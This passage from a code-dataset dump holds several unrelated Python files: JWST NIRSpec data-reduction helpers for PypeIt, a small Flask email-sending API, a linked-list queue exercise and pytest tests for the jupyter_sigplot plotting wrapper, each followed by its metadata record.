slit_righ, spec_min, spec_max, meta_list\n\n\ndef jwst_proc_old(e2d_slit, final_slit, intflat_slit=None, kludge_err=1.0):\n\n\n    # Try to reverse engineer all the things they multiply into the data\n    slit_name = e2d_slit.name\n\n    t_eff = e2d_slit.meta.exposure.effective_exposure_time\n    # TODO I don't know how the t_eff quantity is defined. Better would be some proxy for the exposure time per pixel\n    # The science data is divided by (flat*pathloss*barshadow) and then multiplied by photom_conversion. Since\n    # we work in units of counts, we divide by the photom conversion and multiply by t_eff.\n\n    # This is the raw e2d data before the pipeline does idiotic things\n    raw_data_counts = np.array(e2d_slit.data.T, dtype=float)*t_eff\n    raw_var_poisson = kludge_err**2*np.array(e2d_slit.var_poisson.T, dtype=float)*t_eff**2\n    raw_var_rnoise = kludge_err**2*np.array(e2d_slit.var_rnoise.T, dtype=float)*t_eff**2\n    raw_var = kludge_err**2*np.square(np.array(e2d_slit.err.T, dtype=float))*t_eff**2\n\n    photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n    pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n        np.array(final_slit.pathloss_point.T, dtype=float)\n    if pathloss.shape == (0,0):\n        msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n        pathloss = np.ones_like(raw_data_counts)\n    flatfield = np.array(intflat_slit.data.T, dtype=float) if intflat_slit is not None else np.ones_like(raw_data_counts)\n    barshadow = np.array(final_slit.barshadow.T, dtype=float)\n\n    # This is the conversion between final2d and e2d, i.e. 
final2d = jwst_scale*e2d\n jwst_scale = photom_conversion / flatfield / pathloss / barshadow\n flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n\n #science = np.array(e2d_slit.data.T, dtype=float) * flux_to_counts\n\n total_flat = flatfield * pathloss * barshadow\n total_flat_square = np.square(total_flat)\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt\n\n science, flat_bpm = flat.flatfield(raw_data_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat**2)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat**2)\n var, _ = flat.flatfield(raw_var, total_flat**2)\n sciivar = inverse(var)\n\n # TODO Currently the var_flat is nonsense I think and so I'm just going to use the var_poisson and var_rnoise to get\n # the noise. If this gets fixed use the line below which includes the var_flat.\n # err = kludge_err*np.array(slit.err.T, dtype=float)*flux_to_counts\n #var_poisson = slit.var_poisson.T * flux_to_counts ** 2\n #var_rnoise = slit.var_rnoise.T * flux_to_counts ** 2\n #var = kludge_err**2*np.array(var_poisson + var_rnoise, dtype=float)\n # This needs to be multiplied by count_scale to get it into units of counts which is what pypeit requires. I checked\n # that this base_var is equal to e2d.var_rnoise if you remove the flux_to_counts factor.\n # base_var = np.array(final2d.slits[islit].var_rnoise.T, dtype=float)*flux_to_counts**2*count_scale**2\n #base_var = np.array(slit.var_rnoise.T, dtype=float) * flux_to_counts ** 2\n\n # TODO I'm unsure about these\n dq = np.array(final_slit.dq.T, dtype=int)\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n\n gpm = np.logical_not(dq & DO_NOT_USE)\n\n finite_mask = np.isfinite(science)\n nanmask = np.logical_not(finite_mask)\n science[nanmask] = 0.0\n # err[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar = inverse(var) * gpm\n base_var[nanmask] = 0.0\n count_scale[nanmask] = 0.0\n # Wave nanmask is different from data nanmask\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n nanmask_wave = np.logical_not(np.isfinite(waveimg))\n wave_min = np.min(waveimg[np.logical_not(nanmask_wave)])\n wave_max = np.max(waveimg[np.logical_not(nanmask_wave)])\n nanmask_ra = np.logical_not(np.isfinite(ra))\n ra_min = np.min(ra[np.logical_not(nanmask_ra)])\n ra_max = np.max(ra[np.logical_not(nanmask_ra)])\n waveimg[nanmask_wave] = 0.0\n ra[nanmask_ra] = 0.0\n\n\n # TODO Figure out a way to get the slit boundaries from the WCS itself instead of this kludge with the nan values\n slit_left, slit_righ = jwst_get_slits(finite_mask)\n # Generate some tilts and a spatial image\n tilts = np.zeros_like(waveimg)\n tilts[np.isfinite(waveimg)] = (waveimg[np.isfinite(waveimg)] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. 
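    # --- Illustrative aside (hypothetical, inert) ---
    # The flat.flatfield calls above are first-order error propagation for a
    # division: var(x/f) = var(x)/f**2, with non-positive flat pixels masked.
    # A minimal numpy-only sketch of that identity, with stand-in names:
    def _demo_flatfield_var(raw_demo, var_demo, flat_demo):
        good = np.isfinite(flat_demo) & (flat_demo > 0)
        sci = np.zeros_like(raw_demo)
        var = np.zeros_like(var_demo)
        sci[good] = raw_demo[good] / flat_demo[good]
        var[good] = var_demo[good] / flat_demo[good]**2
        return sci, var, good  # good doubles as a flat bad-pixel mask
    # --- end aside; the spat_pix TODO above continues ---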
For now don't use it\n nspec, nspat = science.shape\n spat_pix = (ra - ra_min) / (ra_max - ra_min) * (nspat - 1)\n spat_pix[nanmask_ra] = 0.0\n\n\n return science, sciivar, gpm, base_var, count_scale, tilts, waveimg, finite_mask, slit_left, slit_righ, t_eff\n\n\n\n\ndef jwst_extract_subimgs_old(e2d_slit, final_slit, intflat_slit):\n\n # The various multiplicative calibrations we need.\n slit_name = final_slit.name\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n dec = caldec.T\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n nspec, nspat = ra.shape\n src_ra, src_dec= final_slit.meta.target.ra, final_slit.meta.target.dec\n\n cal_spat = np.arange(nspat) # spatial position\n src_trace_ra = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n src_trace_dec = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a functio of RA onto the source RA\n src_trace_ra[ispec] = np.interp(src_ra, ra_vs_spat[np.isfinite(ra_vs_spat)],\n cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, ispec]\n src_trace_dec[ispec] = np.interp(src_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n\n waveimg_from_wcs = calwave.T\n # Sometimes this fails at the 1e-4 level and disagreess about nans???\n #assert np.allclose(waveimg, waveimg_from_wcs, rtol=1e-3, atol=1e-3, equal_nan=True)\n\n\n flatfield = np.array(intflat_slit.data.T, dtype=float) #if intflat_slit is not None else np.ones_like(pathloss)\n pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n np.array(final_slit.pathloss_point.T, dtype=float)\n if pathloss.shape == (0,0):\n msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n pathloss = np.ones_like(flatfield)\n\n barshadow = np.array(final_slit.barshadow.T, dtype=float)\n if barshadow.shape == (0,0):\n msgs.warn('No barshadow for slit {0}'.format(slit_name) + ', setting to 1.0')\n barshadow = np.ones_like(flatfield)\n\n photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n final = np.array(final_slit.data.T, dtype=float)\n rate = np.array(e2d_slit.data.T, dtype=float)\n rate_var_rnoise = np.array(e2d_slit.var_rnoise.T, dtype=float)\n rate_var_poisson = np.array(e2d_slit.var_poisson.T, dtype=float)\n # This is currently buggy as it includes flat field error\n rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(final_slit.dq.T, dtype=int)\n\n\n # Generate some tilts and a spatial image\n finitemask = np.isfinite(waveimg)\n wave_min, wave_max = np.min(waveimg[finitemask]), np.max(waveimg[finitemask])\n\n tilts = np.zeros_like(waveimg)\n tilts[finitemask] = (waveimg[finitemask] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. 
For now don't use it\n # This currnetly depends on poisition angle which I need to hack to fix\n # ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n # spat_pix_sub = np.zeros_like(ra_sub)\n # spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n # Get slit bounadries\n slit_left, slit_righ = jwst_get_slits(finitemask)\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_slit.xstart - 1\n spec_hi = spec_lo + final_slit.xsize\n spat_lo = final_slit.ystart - 1\n spat_hi = spat_lo + final_slit.ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n slit_left_orig = spat_lo + slit_left\n slit_righ_orig = spat_lo + slit_righ\n spec_vals_orig = spec_lo + np.arange(spec_hi - spec_lo)\n\n\n return slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, \\\n rate, rate_var_rnoise, rate_var_poisson, rate_var_tot, dq, \\\n ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final\n\n","sub_path":"dev_algorithms/jwst/jwst_utils.py","file_name":"jwst_utils.py","file_ext":"py","file_size_in_byte":37661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"513483641","text":"from flask import render_template, request, make_response, jsonify, redirect\nfrom markupsafe import Markup, escape\nimport config\nfrom mail.flask_mail import flask_plain_email, flask_template_email, mail\nfrom flask_mail import Message\nfrom config import mail\n\n\n# Get the application instance\nconnex_app = config.connex_app\n\n# Read the swagger.yml file to configure the endpoints\nconnex_app.add_api(\"swagger.yml\")\n\n\n@connex_app.route('/')\ndef documentation():\n return redirect('/v1/ui')\n\n@connex_app.route('/v1/documentation')\ndef json_documentation():\n return redirect('/v1/swagger.json')\n\n\n@connex_app.route('/v1/configure')\ndef key_value_json():\n return redirect('/v1/ui')\n\n@connex_app.route('/v1/sendmail/interface')\ndef home():\n return render_template('home.html')\n\n@connex_app.route('/v1/sendmail/demo')\ndef send_email():\n return render_template('create.html')\n\n\n@connex_app.route('/sendmail/html', methods=['POST'])\ndef sendmail_html():\n if request.method == 'POST':\n subject = Markup.escape(request.form['subject'])\n message = ''+ request.form['message'] +''\n recipients = request.form['recipients']\n mail_list = recipients.split(',')\n len_list = len(mail_list) - 1\n if recipients != '' or message != '' or subject != '':\n with mail.connect() as conn:\n while len_list > -1:\n msg = Message(recipients=[mail_list[len_list]], html=message, subject=subject)\n \n try:\n conn.send(msg)\n response = {\n 'status': 'success',\n 'data':{\n 'message': 'Mail sent successfully'\n }\n }\n status = 200\n except Exception:\n response = {\n 'status': 'error',\n 'data':{\n 'message': 'Error: Mail was not sent.'\n }\n }\n status = 500\n len_list -= 1\n return make_response(jsonify(response), status)\n\n\n@connex_app.route('/sendmail/text', methods=['POST'])\ndef sendmail_text():\n if request.method == 'POST':\n subject = Markup.escape(request.form['subject'])\n message = Markup.escape(request.form['message'])\n recipients = request.form['recipients']\n mail_list = recipients.split(',')\n len_list = len(mail_list) - 1\n if recipients != '' or message != '' or subject != '':\n with mail.connect() as conn:\n while len_list > -1:\n msg 
= Message(recipients=[mail_list[len_list]], body=message, subject=subject)\n \n try:\n conn.send(msg)\n response = {\n 'status': 'success',\n 'data':{\n 'message': 'Mail sent successfully'\n }\n }\n status = 200\n except Exception:\n response = {\n 'status': 'error',\n 'data':{\n 'message': 'Error: Mail was not sent.'\n }\n }\n status = 500\n len_list -= 1\n return make_response(jsonify(response), status)\n \n \n\nif __name__ == '__main__':\n connex_app.run(host='127.0.0.1', port=3000, debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"599783274","text":"class ListNode:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n self.size = 0\r\n\r\n# 印出list中的所有資料\r\n def PrintList(self): \r\n arr = self.head\r\n while arr != None:\r\n print(arr.value, end=' ')\r\n arr = arr.next\r\n print()\r\n\r\n# dequeue:取出佇列前端之資料\r\n def dequeue(self): \r\n pop = self.head\r\n if pop == None:\r\n print(\"List is empty.\")\r\n else:\r\n self.head = pop.next\r\n pop = None\r\n self.size -= 1\r\n# enqueue:將資料放入佇列尾端\r\n def enqueue(self, data): \r\n NewNode = ListNode(data)\r\n if self.head == None:\r\n self.head = NewNode\r\n else:\r\n push = self.head\r\n while(push.next != None):\r\n push = push.next\r\n push.next = ListNode(data)\r\n self.size += 1\r\n\r\nif __name__ == '__main__': # 檔案被import時,不執行main()函式\r\n\r\n list = LinkedList()\r\n list.enqueue(2)\r\n list.enqueue(4)\r\n list.enqueue(6)\r\n list.PrintList()\r\n list.dequeue()\r\n list.PrintList()\r\n list.enqueue(19)\r\n list.PrintList()\r\n list.dequeue()\r\n list.PrintList()","sub_path":"queue/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"392828847","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport pytest\nfrom mock import patch\nimport numpy as np\nfrom IPython.testing.globalipapp import get_ipython\n\nip = get_ipython()\n\nfrom jupyter_sigplot.sigplot import SigPlot # noqa: E402\nfrom testutil import EnvironmentVariable # noqa: E402\n\n\ndef test_empty_object():\n plot = SigPlot()\n assert plot.inputs == []\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {}\n\n\ndef test_non_empty_object():\n plot = SigPlot(\"foo.tmp\")\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {}\n\n\ndef test_change_settings():\n options = {'noyaxis': True, 'noxaxis': True}\n plot = SigPlot(\"foo.tmp\", options=options)\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == options\n\n new_options = {'noyaxis': False, 'xi': True}\n plot.change_settings(**new_options)\n assert plot.inputs == [\"foo.tmp\"]\n assert plot.hrefs == []\n assert plot.arrays == []\n assert plot.options == {'noyaxis': False, 'noxaxis': True, 'xi': True}\n\n\ndef test_show_1d_array():\n plot = SigPlot()\n assert plot.arrays == []\n assert plot.array_obj == {}\n\n data = [1, 2, 3]\n layer_type = '1D'\n plot.show_array(data, layer_type=layer_type)\n\n array_obj = {\n \"data\": data,\n \"overrides\": {},\n \"layerType\": layer_type,\n }\n assert plot.array_obj == array_obj\n assert plot.arrays == [array_obj]\n\n\ndef test_subsize_show_2d_array():\n plot = 
SigPlot()\n assert plot.arrays == []\n assert plot.array_obj == {}\n\n data = [[1, 2, 3], [3, 4, 5]]\n layer_type = '2D'\n subsize = len(data[0])\n plot.show_array(data, layer_type=layer_type, subsize=subsize)\n\n array_obj = {\n \"data\": data,\n \"overrides\": {\n \"subsize\": subsize\n },\n \"layerType\": layer_type,\n }\n assert plot.array_obj == array_obj\n assert plot.arrays == [array_obj]\n\n\ndef test_no_subsize_show_2d_array():\n plot = SigPlot()\n data = [[1, 2, 3], [3, 4, 5]]\n with pytest.raises(ValueError):\n plot.show_array(data, layer_type='2D', subsize=None)\n\n\ndef test_overlay_array_bad_type():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = 3\n with pytest.raises(TypeError):\n plot.overlay_array(data)\n\n\ndef test_overlay_array_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = []\n plot.overlay_array(data)\n assert plot.inputs == [data]\n\n\ndef test_overlay_array_non_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n data = [1, 2, 3]\n plot.overlay_array(data)\n assert plot.inputs == [data]\n\n\ndef test_show_href_url():\n plot = SigPlot()\n assert plot.href_obj == {}\n assert plot.hrefs == []\n\n path = \"http://sigplot.lgsinnovations.com/dat/sin.tmp\"\n layer_type = \"1D\"\n plot.show_href(path, layer_type)\n\n href_obj = {\n \"filename\": \"sin.tmp\",\n \"layerType\": layer_type,\n }\n assert plot.href_obj == href_obj\n assert plot.hrefs == [href_obj]\n assert plot.oldHrefs == [href_obj]\n\n assert os.path.exists(\"./sin.tmp\")\n os.remove(\"./sin.tmp\")\n\n\ndef test_show_href_file_absolute_already_in_cwd():\n plot = SigPlot()\n\n assert plot.inputs == []\n\n path = os.path.join(os.getcwd(), \"sin.tmp\")\n plot.show_href(path, '1D')\n\n href_obj = {\n \"filename\": 'sin.tmp',\n \"layerType\": '1D',\n }\n assert plot.href_obj == href_obj\n assert plot.hrefs == [href_obj]\n assert plot.oldHrefs == [href_obj]\n\n\n@patch('os.mkdir')\n@patch('os.symlink')\ndef test_show_href_file_absolute_not_already_there(symlink_mock, mkdir_mock):\n path = \"~/foo.tmp\"\n plot = SigPlot()\n\n plot.show_href(path, '1D')\n assert mkdir_mock.call_count == 1\n assert mkdir_mock.call_args[0][0] == '.'\n\n assert symlink_mock.call_count == 1\n\n local_path = 'foo.tmp'\n fpath = os.path.expanduser(os.path.expandvars(path))\n assert symlink_mock.call_args[0] == (fpath, local_path)\n\n\n@patch('os.mkdir')\n@patch('os.symlink')\ndef test_show_href_file_relative(symlink_mock, mkdir_mock):\n path = \"../foo.tmp\"\n plot = SigPlot()\n\n plot.show_href(path, '1D')\n assert mkdir_mock.call_count == 1\n assert mkdir_mock.call_args[0][0] == '.'\n\n assert symlink_mock.call_count == 1\n\n local_path = 'foo.tmp'\n fpath = os.path.expanduser(os.path.expandvars(path))\n assert symlink_mock.call_args[0] == (fpath, local_path)\n\n\ndef test_overlay_href_non_empty_file():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"foo.tmp\"\n plot.overlay_href(path)\n assert plot.inputs == [path]\n\n\ndef test_overlay_href_non_empty_http():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"http://sigplot.lgsinnovations.com/dat/sin.tmp\"\n plot.overlay_href(path)\n\n assert os.path.exists(\"./sin.tmp\")\n assert plot.inputs == [\"sin.tmp\"]\n\n os.remove(\"./sin.tmp\")\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\ndef test_plot_one_href(show_href_mock):\n href = \"foo.tmp\"\n plot = SigPlot(href)\n assert plot.inputs == [href]\n\n plot.plot()\n assert show_href_mock.call_count == 1\n assert show_href_mock.call_args[0] == ({\n \"filename\": 
href,\n \"layerType\": \"1D\"},)\n assert show_href_mock.call_args[1] == {}\n assert plot.done\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\ndef test_plot_two_href(show_href_mock):\n href1 = \"foo.tmp\"\n href2 = \"sin.tmp\"\n href = \"|\".join((href1, href2))\n plot = SigPlot(href)\n assert plot.inputs == [href1, href2]\n\n plot.plot()\n assert show_href_mock.call_count == 2\n args1, kwargs1 = show_href_mock.call_args_list[0]\n assert args1 == ({\"filename\": href1, \"layerType\": \"1D\"},)\n assert kwargs1 == {}\n\n args2, kwargs2 = show_href_mock.call_args_list[1]\n assert args2 == ({\"filename\": href2, \"layerType\": \"1D\"},)\n assert kwargs2 == {}\n assert plot.done\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot._show_href_internal')\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_mixed(show_array_mock, show_href_mock):\n href = \"foo.tmp\"\n arr = [1, 2, 3, 4]\n\n plot = SigPlot(href, arr)\n assert plot.inputs == [href, arr]\n\n plot.plot()\n assert show_href_mock.call_count == 1\n assert show_array_mock.call_count == 1\n\n assert show_href_mock.call_args[0] == ({\"filename\": href,\n \"layerType\": \"1D\",\n },)\n\n assert show_array_mock.call_args[0] == (arr, )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"1D\",\n \"subsize\": None\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_1d(show_array_mock):\n arr = np.array([1, 2, 3, 4])\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot()\n assert show_array_mock.call_count == 1\n print(show_array_mock.call_args)\n assert show_array_mock.call_args[0] == (arr.tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"1D\",\n \"subsize\": None\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_2d_no_subsize(show_array_mock):\n arr = [[1, 2, 3, 4], [5, 6, 7, 8]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot(layer_type=\"2D\")\n assert show_array_mock.call_count == 1\n assert show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": len(arr[0])\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_2d_with_subsize(show_array_mock):\n arr = [[1, 2, 3, 4], [5, 6, 7, 8]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n subsize = len(arr[0])\n plot.plot(layer_type=\"2D\", subsize=subsize)\n assert show_array_mock.call_count == 1\n assert show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": subsize\n }\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_3d(show_array_mock):\n arr = [[[1], [2], [3], [4]], [[5], [6], [7], [8]]]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n subsize = len(arr[0])\n with pytest.raises(ValueError):\n plot.plot(layer_type=\"2D\", subsize=subsize)\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_expected_2d(show_array_mock):\n arr = [1, 2, 3, 4]\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n with pytest.raises(ValueError):\n plot.plot(layer_type=\"2D\")\n\n\n@patch('jupyter_sigplot.sigplot.SigPlot.show_array')\ndef test_plot_expected_2d_with_subsize(show_array_mock):\n arr = [1, 2, 3, 4]\n\n subsize = 2\n\n plot = SigPlot(arr)\n assert plot.inputs == [arr]\n\n plot.plot(layer_type=\"2D\", subsize=subsize)\n assert show_array_mock.call_count == 1\n assert 
show_array_mock.call_args[0] == (np.array(arr).flatten().tolist(), )\n assert show_array_mock.call_args[1] == {\n \"layer_type\": \"2D\",\n \"subsize\": subsize\n }\n\n\ndef test_overlay_file_non_empty():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = \"foo.tmp\"\n plot.overlay_file(path)\n assert plot.inputs == [path]\n\n\ndef test_overlay_file_bad_type():\n plot = SigPlot()\n assert plot.inputs == []\n\n path = 3\n with pytest.raises(TypeError):\n plot.overlay_file(path)\n\n\ndef test_unravel_path():\n import time\n from jupyter_sigplot.sigplot import _unravel_path\n\n cwd_full = os.getcwd()\n tilde_full = os.path.expanduser('~')\n\n # Go all the way through the environment instead of a mock to be sure the\n # whole thing works end to end\n with EnvironmentVariable('TEST_UNRAVEL', str(time.time())) as envvar:\n env_key = envvar.key\n env_val = envvar.new_value\n\n cases = [\n # input # expected output\n ('', cwd_full),\n ('.', cwd_full),\n ('./nonesuch/..', cwd_full),\n\n ('~', tilde_full),\n\n # Leading / because bare words are unraveled relative to cwd\n ('/$%s' % env_key, os.path.join('/', env_val)),\n\n ('~/$%s' % env_key, os.path.join(tilde_full, env_val)),\n\n ('/', '/'),\n ('/../', '/'),\n ]\n\n platform_specific_cases = [\n ('/tmp', '/tmp'),\n ('/tmp/foo/..', '/tmp'),\n ]\n\n for (input, expected) in platform_specific_cases:\n # macOS-compatibility\n if sys.platform.startswith('darwin'):\n cases.append((input, \"/private\" + expected))\n else:\n cases.append((input, expected))\n\n for (input, expected) in cases:\n actual = _unravel_path(input)\n assert(actual == expected)\n\n\n@patch('os.mkdir')\ndef test_require_dir_good_inputs(mkdir_mock):\n from jupyter_sigplot.sigplot import _require_dir\n\n inputs = (\n '.',\n 'data',\n )\n\n for d in inputs:\n _require_dir(d)\n args, kwargs = mkdir_mock.call_args\n assert args[0] == d\n\n assert mkdir_mock.call_count == len(inputs)\n\n # Special case: '' means '.'\n _require_dir('')\n assert mkdir_mock.call_args[0][0] == '.'\n\n\ndef test_local_name_for_href_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_href\n\n cases = [\n # input # expected output\n ('http://www.example.com/foo.tmp', 'foo.tmp'),\n ('http://www.example.com/dat/foo.tmp', 'foo.tmp'),\n ('https://localhost/foo.tmp', 'foo.tmp'),\n ('https://localhost/dat/foo.tmp', 'foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n for ld in local_dirs:\n for (input, expected) in cases:\n actual = _local_name_for_href(input, ld)\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_href_bad_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_href\n cases = [\n # url local_dir exception\n ('http://localhost/foo.tmp', None, TypeError),\n (None, '.', TypeError),\n ('', '.', ValueError),\n ]\n for url, local_dir, etype in cases:\n with pytest.raises(etype):\n _local_name_for_href(url, local_dir)\n\n # TODO (sat 2018-11-19): Decide whether we want _local_name_for_href to\n # validate URLs more strictly; if so, add tests here.\n\n\ndef test_local_name_for_file_local_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # input # expected output\n ('foo.tmp', 'foo.tmp'),\n ('dat/foo.tmp', 'dat/foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n # None of these should require symlinks\n for ld in local_dirs:\n for (input, expected) in cases:\n # This test could definitely be stronger. 
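            # --- Illustrative aside: these table-driven loops could be strengthened with
            # pytest.mark.parametrize, which reports each case as its own test. Sketch
            # only (it would have to live at module level, so it is left commented out;
            # the test name below is hypothetical):
            #
            # @pytest.mark.parametrize("fpath, expected", [
            #     ("foo.tmp", "foo.tmp"),
            #     ("dat/foo.tmp", "dat/foo.tmp"),
            # ])
            # def test_local_name_for_file_param(fpath, expected):
            #     actual, is_local = _local_name_for_file(fpath, ".")
            #     assert is_local
            #     assert actual == os.path.join(".", expected)
            #
            # --- end aside; the original comment continues below ---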
The current idea is just\n # to ensure that some basic cases work right.\n input = os.path.join(ld, input)\n\n actual, is_local = _local_name_for_file(input, ld)\n assert is_local\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_file_nonlocal_good_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # input # expected output\n ('/data/foo.tmp', 'foo.tmp'),\n ('../dat/foo.tmp', 'foo.tmp'),\n ('../foo.tmp', 'foo.tmp'),\n ('data/../../foo.tmp', 'foo.tmp'),\n ]\n local_dirs = ['.', 'data', 'files/data', '/path/to/data', ]\n\n # All these should require symlinks\n for ld in local_dirs:\n for (input, expected) in cases:\n actual, is_local = _local_name_for_file(input, ld)\n assert not is_local\n expected = os.path.join(ld, expected)\n assert(actual == expected)\n\n\ndef test_local_name_for_file_bad_inputs():\n from jupyter_sigplot.sigplot import _local_name_for_file\n cases = [\n # fpath local_dir exception\n ('foo.tmp', None, TypeError),\n (None, '.', TypeError),\n ('', '.', ValueError),\n ]\n for fpath, local_dir, etype in cases:\n with pytest.raises(etype):\n _local_name_for_file(fpath, local_dir)\n\n\ndef test_split_inputs():\n from jupyter_sigplot.sigplot import _split_inputs\n cases = [\n # input # expected output\n ('', []),\n ('a', ['a']),\n ('a|b', ['a', 'b']),\n\n ('file.tmp', ['file.tmp']),\n ('file.tmp|http://url/', ['file.tmp', 'http://url/']),\n\n (' a ', ['a']),\n (' a | b ', ['a', 'b']),\n\n ('|', []),\n ('||', []),\n ('a|', ['a']),\n ('|a', ['a']),\n ('||a|||', ['a']),\n ('||a|||b|', ['a', 'b']),\n (' | || | ', []),\n ]\n for (input, expected) in cases:\n actual = _split_inputs(input)\n assert(actual == expected)\n\n\n@patch('jupyter_sigplot.sigplot._prepare_file_input')\n@patch('jupyter_sigplot.sigplot._prepare_http_input')\ndef test_prepare_href_input(prepare_http_input_mock,\n prepare_file_input_mock):\n from jupyter_sigplot.sigplot import _prepare_href_input\n\n # The value is unimportant for this test\n local_dir = None\n\n def reset():\n for m in (prepare_file_input_mock,\n prepare_http_input_mock,\n ):\n m.reset_mock()\n\n # empty input\n _prepare_href_input('', local_dir)\n prepare_http_input_mock.assert_not_called()\n prepare_file_input_mock.assert_not_called()\n\n # file only\n reset()\n _prepare_href_input('foo.tmp', local_dir)\n prepare_http_input_mock.assert_not_called()\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # url only\n reset()\n _prepare_href_input('https://www.example.com/bar.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_not_called()\n\n # file and url\n reset()\n _prepare_href_input('foo.tmp|https://www.example.com/bar.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # order independence\n reset()\n _prepare_href_input('https://www.example.com/bar.tmp|foo.tmp', local_dir)\n prepare_http_input_mock.assert_called_once_with(\n 'https://www.example.com/bar.tmp',\n local_dir)\n prepare_file_input_mock.assert_called_once_with('foo.tmp', local_dir)\n\n # multiple of each\n 